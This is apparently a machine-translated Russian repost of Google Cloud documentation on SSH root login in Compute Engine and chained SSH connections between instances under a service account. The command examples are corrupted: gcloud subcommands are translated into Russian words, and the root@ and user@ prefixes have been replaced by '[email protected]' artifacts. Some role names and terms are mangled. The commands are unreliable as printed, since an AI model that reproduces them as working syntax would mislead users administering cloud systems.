По умолчанию общедоступные изображения и наиболее распространенные операционные системы не разрешают вход в систему root с паролем через SSH.Если пользователь требуются права root, они могут получить эти разрешения, выполнив команды через судо .

В виртуальных машинах Compute Engine файл конфигурации /etc/ssh/sshd_config SSH имеет параметр PermitRootLogin , установленный на запрещающий пароль или без . Когда PermitRootLogin=prohibit-password , вы не можете подключиться к виртуальной машине как root , если вы не укажете ключ SSH для root в метаданных вашего проекта или экземпляра.Когда PermitRootLogin=no , вы не сможете подключиться, даже если вы укажете ключ SSH для root в метаданных вашего проекта или экземпляра.

Вы можете изменить параметр PermitRootLogin , однако мы рекомендуем вместо этого запускать команды через sudo .

Если вы настроили экземпляр для разрешения SSH в качестве пользователя root и настроили Ключ SSH для пользователя root на этом экземпляре, вы можете подключиться как root, используя команда gcloud computing ssh с [email protected] указанный перед именем экземпляра:

gcloud вычисляет ssh \
    --project=  PROJECT_ID  \
    --zone=  ЗОНА  \
    [email protected]  ИМЯ_ЭКЗЕМПЛЯРА  

Заменить следующее:

  • PROJECT_ID : идентификатор проекта, который содержит экземпляр
  • ZONE : имя зоны, в которой находится экземпляр расположен
  • INSTANCE_NAME : имя экземпляра

Ручное подключение между экземплярами в качестве учетной записи службы

В некоторых ситуациях может потребоваться подключение к экземплярам и запуск команд как если вы были учетной записью службы, связанной с этим экземпляром. Команда gcloud Compute ssh позволяет используйте учетные данные SSH учетной записи службы для подключения из одного экземпляра к другой, позволяющий запускать команды на втором экземпляре в качестве учетной записи службы.

Интерфейс командной строки Google Cloud автоматически создает пару ключей SSH и связывает ее с учетной записью службы на вашем экземпляре. После подключения к другому экземпляру в качестве учетной записи службы вы можете запускать дополнительные команды gcloud , используя разрешения IAM сервисной учетной записи.

В этом примере предположим, что у вас есть следующая среда:

  • Экземпляр А:
    • С экземпляром A связана учетная запись службы.
    • Учетная запись службы, связанная с экземпляром A, имеет необходимые Роли входа в ОС настроен либо на уровне проекта, либо специально для экземпляра B ресурс.
    • Учетная запись службы имеет https://www.googleapis.com/auth/cloud-platform охват всей платформы на экземпляре A.
  • Экземпляр Б:
    • Экземпляр B работает либо в той же внутренней сети, что и экземпляр A, либо в сеть с правилами брандмауэра, разрешающими SSH-подключения из экземпляра A.
    • Функция входа в ОС включена в вашем проекте или конкретно в экземпляре B.
  • Ваш личный кабинет пользователя:
    • Ваша учетная запись имеет ролей/iam.serviceAccountUser роль для учетной записи службы, связанной с экземпляром A.
    • У вашей учетной записи есть SSH-доступ конкретно к экземпляру A.
    • У вашей учетной записи нет доступа к экземпляру B. Учетная запись службы является только учетная запись с Роли входа в ОС необходимо для подключения к экземпляру B.

Подключитесь к экземпляру A и выполните команды от имени этой учетной записи службы. Этот шаг требует, чтобы у вас была роль roles/iam.serviceAccountUser для этого служебный аккаунт:

  1. Подключение к экземпляру A как пользователь с ролью roles/iam.serviceAccountUser . Например, вы можно использовать интерфейс командной строки Google Cloud для установки этого первого соединения SSH:

    gcloud вычислить ssh instance-a --project=  PROJECT_ID  --zone=  ZONE  
  2. Пока у вас есть roles/iam.роль serviceAccountUser после использования SSH для подключения к экземпляру A, вы можете выполнять команды, как если бы вы были сервисный счет. В этом примере запустите интерфейс командной строки gcloud на экземпляре A. для создания цепочного SSH-подключения к экземпляру B. Интерфейс командной строки gcloud указывает, что экземпляр B может использовать вход в ОС, а также что учетная запись службы имеет необходимые роли IAM для использования SSH для подключения к экземпляру B.

    gcloud вычислить ssh instance-b --project=  PROJECT_ID  --zone=  ZONE  

    Вывод аналогичен следующему:

     ПРЕДУПРЕЖДЕНИЕ: использование пользователя для входа в ОС [sa_1134848438711199] вместо пользователя по умолчанию [my-username]
    Экземпляр Linux-b 4.9.0-8-amd64 #1 SMP Debian 4.9.110-3+deb9u6 (2018-10-08) x86_64
    ⋮
     
  3. Теперь вы подключены к экземпляру B в качестве учетной записи службы и можете выполнять команды в качестве этой учетной записи службы, например:

    .
    sa_1134[email protected]:~$ uname -a
    
    Экземпляр Linux-b 4.9.0-8-amd64 #1 SMP Debian 4.9.110-3+deb9u6 (08.10.2018) x86_64 GNU/Linux
     

Что дальше

.

Добавить комментарий

Ваш адрес email не будет опубликован.